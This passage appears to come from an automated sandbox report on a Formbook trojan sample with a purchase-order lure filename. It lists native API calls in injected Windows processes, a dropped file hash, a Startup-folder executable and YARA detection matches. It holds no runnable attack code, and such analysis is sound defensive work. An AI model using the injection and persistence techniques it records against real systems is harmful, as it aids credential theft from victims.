                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01554260 NtSetContextThread, | 18_2_01554260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01554570 NtSuspendThread, | 18_2_01554570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_015529D0 NtWaitForSingleObject, | 18_2_015529D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_015529F0 NtReadFile, | 18_2_015529F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552B10 NtAllocateVirtualMemory, | 18_2_01552B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552B00 NtQueryValueKey, | 18_2_01552B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552B20 NtQueryInformationProcess, | 18_2_01552B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552BE0 NtQueryVirtualMemory, | 18_2_01552BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552B80 NtCreateKey, | 18_2_01552B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552A10 NtWriteFile, | 18_2_01552A10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552AC0 NtEnumerateValueKey, | 18_2_01552AC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552AA0 NtQueryInformationFile, | 18_2_01552AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552D50 NtWriteVirtualMemory, | 18_2_01552D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552DC0 NtAdjustPrivilegesToken, | 18_2_01552DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552DA0 NtReadVirtualMemory, | 18_2_01552DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552C50 NtUnmapViewOfSection, | 18_2_01552C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552C10 NtOpenProcess, | 18_2_01552C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552C30 NtMapViewOfSection, | 18_2_01552C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552C20 NtSetInformationFile, | 18_2_01552C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552CD0 NtEnumerateKey, | 18_2_01552CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552CF0 NtDelayExecution, | 18_2_01552CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552F00 NtCreateFile, | 18_2_01552F00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552F30 NtOpenDirectoryObject, | 18_2_01552F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552FB0 NtSetValueKey, | 18_2_01552FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552E50 NtCreateSection, | 18_2_01552E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552E00 NtQueueApcThread, | 18_2_01552E00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552ED0 NtResumeThread, | 18_2_01552ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552EC0 NtQuerySection, | 18_2_01552EC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552E80 NtCreateProcessEx, | 18_2_01552E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_015538D0 NtGetContextThread, | 18_2_015538D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01553C30 NtOpenProcessToken, | 18_2_01553C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01553C90 NtOpenThread, | 18_2_01553C90
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E14570 NtSuspendThread,LdrInitializeThunk, | 24_2_04E14570
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E14260 NtSetContextThread,LdrInitializeThunk, | 24_2_04E14260
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12CF0 NtDelayExecution,LdrInitializeThunk, | 24_2_04E12CF0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12C50 NtUnmapViewOfSection,LdrInitializeThunk, | 24_2_04E12C50
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12C30 NtMapViewOfSection,LdrInitializeThunk, | 24_2_04E12C30
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12DA0 NtReadVirtualMemory,LdrInitializeThunk, | 24_2_04E12DA0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12D10 NtQuerySystemInformation,LdrInitializeThunk, | 24_2_04E12D10
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12ED0 NtResumeThread,LdrInitializeThunk, | 24_2_04E12ED0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12E50 NtCreateSection,LdrInitializeThunk, | 24_2_04E12E50
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12E00 NtQueueApcThread,LdrInitializeThunk, | 24_2_04E12E00
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E12F00 NtCreateFile,LdrInitializeThunk, | 24_2_04E12F00
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E129F0 NtReadFile,LdrInitializeThunk, | 24_2_04E129F0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12AC0 NtEnumerateValueKey,LdrInitializeThunk,24_2_04E12AC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12A80 NtClose,LdrInitializeThunk,24_2_04E12A80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12A10 NtWriteFile,LdrInitializeThunk,24_2_04E12A10
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12BC0 NtQueryInformationToken,LdrInitializeThunk,24_2_04E12BC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B80 NtCreateKey,LdrInitializeThunk,24_2_04E12B80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B90 NtFreeVirtualMemory,LdrInitializeThunk,24_2_04E12B90
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B00 NtQueryValueKey,LdrInitializeThunk,24_2_04E12B00
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B10 NtAllocateVirtualMemory,LdrInitializeThunk,24_2_04E12B10
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E134E0 NtCreateMutant,LdrInitializeThunk,24_2_04E134E0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E138D0 NtGetContextThread,LdrInitializeThunk,24_2_04E138D0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12CD0 NtEnumerateKey,24_2_04E12CD0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12C20 NtSetInformationFile,24_2_04E12C20
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12C10 NtOpenProcess,24_2_04E12C10
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12DC0 NtAdjustPrivilegesToken,24_2_04E12DC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12D50 NtWriteVirtualMemory,24_2_04E12D50
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12EC0 NtQuerySection,24_2_04E12EC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12EB0 NtProtectVirtualMemory,24_2_04E12EB0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12E80 NtCreateProcessEx,24_2_04E12E80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12FB0 NtSetValueKey,24_2_04E12FB0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12F30 NtOpenDirectoryObject,24_2_04E12F30
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E129D0 NtWaitForSingleObject,24_2_04E129D0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12AA0 NtQueryInformationFile,24_2_04E12AA0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12BE0 NtQueryVirtualMemory,24_2_04E12BE0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E12B20 NtQueryInformationProcess,24_2_04E12B20
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E13C90 NtOpenThread,24_2_04E13C90
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E13C30 NtOpenProcessToken,24_2_04E13C30
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28A00 NtCreateFile,24_2_02E28A00
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28B70 NtReadFile,24_2_02E28B70
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28E80 NtAllocateVirtualMemory,24_2_02E28E80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28C70 NtDeleteFile,24_2_02E28C70
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E28D10 NtClose,24_2_02E28D10
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_06F630E0 CreateProcessAsUserW,14_2_06F630E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015BD13018_2_015BD130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015251C018_2_015251C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153B1E018_2_0153B1E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152B0D018_2_0152B0D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D70F118_2_015D70F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155508C18_2_0155508C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DF33018_2_015DF330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151138018_2_01511380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D124C18_2_015D124C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150D2EC18_2_0150D2EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DF5C918_2_015DF5C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D75C618_2_015D75C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B549018_2_015B5490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158D48018_2_0158D480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015CD64618_2_015CD646
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015BD62C18_2_015BD62C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DF6F618_2_015DF6F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015936EC18_2_015936EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015659C018_2_015659C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_014E99E818_2_014E99E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152987018_2_01529870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153B87018_2_0153B870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159587018_2_01595870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DF87218_2_015DF872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152380018_2_01523800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D18DA18_2_015D18DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D78F318_2_015D78F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015998B218_2_015998B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155DB1918_2_0155DB19
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DFB2E18_2_015DFB2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B1B8018_2_015B1B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DFA8918_2_015DFA89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153FAA018_2_0153FAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D7D4C18_2_015D7D4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DFD2718_2_015DFD27
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01529DD018_2_01529DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015BFDF418_2_015BFDF4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01523C6018_2_01523C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A7CE818_2_015A7CE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153FCE018_2_0153FCE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B9C9818_2_015B9C98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159FF4018_2_0159FF40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DFF6318_2_015DFF63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D1FC618_2_015D1FC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D9ED218_2_015D9ED2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01521EB218_2_01521EB2
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE0445
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04EAA526
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9A6C0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DDC6E0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE0680
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E04670
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DFC600
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E96757
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DEA760
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE2760
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DD00A0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E8E076
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04EA010E
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DEE310
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DF8CDF
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04EAACEB
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E96C69
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9EC60
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E8EC4C
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E5EC20
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DD0C12
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DEAC20
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DF2DB0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE0D69
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DDAD00
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DD2EE8
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E90EAD
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E80E6D
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E22E48
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E00E50
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE6FE0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9EFBF
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DECF00
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE28C0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DF6882
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E7C89F
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DC6868
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E80835
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E0E810
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9E9A6
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DDE9A0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9EA5B
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9CA13
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E54BC0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE0B10
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E4D480
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E75490
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9F5C9
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E975C6
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E536EC
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9F6F6
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E8D646
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E7D62C
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E81623
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DEB0D0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E970F1
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E1508C
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE51C0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DFB1E0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E2717A
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DCF113
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E7D130
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DCD2EC
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9124C
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DD1380
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9F330
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E67CE8
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DFFCE0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E79C98
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE3C60
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE9DD0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E7FDF4
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E97D4C
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9FD27
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E99ED2
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE1EB2
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E91FC6
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9FF63
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E5FF40
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E978F3
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E918DA
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E598B2
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E55870
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9F872
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE9870
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DFB870
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DE3800
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E259C0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9FA89
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04DFFAA0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E71B80
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E9FB2E
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_04E1DB19
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E11740
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E2B340
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E0104C
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E0C6A0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E0AB18
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E0C8C0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E0A940
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E12FD0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_02E14DF0
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_050FE64C
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_050FD6B8
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_050FE194
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_050FE2BB
                Source: C:\Windows\SysWOW64\clip.exe | Code function: 24_2_050FC988
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\sages.exe 2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04DCB910 appears 275 times
                Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04E27BE4 appears 101 times
                Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04E15050 appears 58 times
                Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04E4E692 appears 86 times
                Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04E5EF10 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 0158E692 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 0150B910 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 0159EF10 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 01567BE4 appears 99 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 01555050 appears 56 times
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.00000000044B5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1251917102.00000000035F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAstronot plart.exe> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp | Binary or memory string: lastOriginalFileName vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.000000000467B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAstronot plart.exe> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1251917102.00000000032D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAstronot plart.exe> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.00000000042D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1249957427.000000000143E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.00000000047DF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAstronot plart.exe> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1263148906.000000006FFEB000.00000020.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs PO# 81136575.exe
                Source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
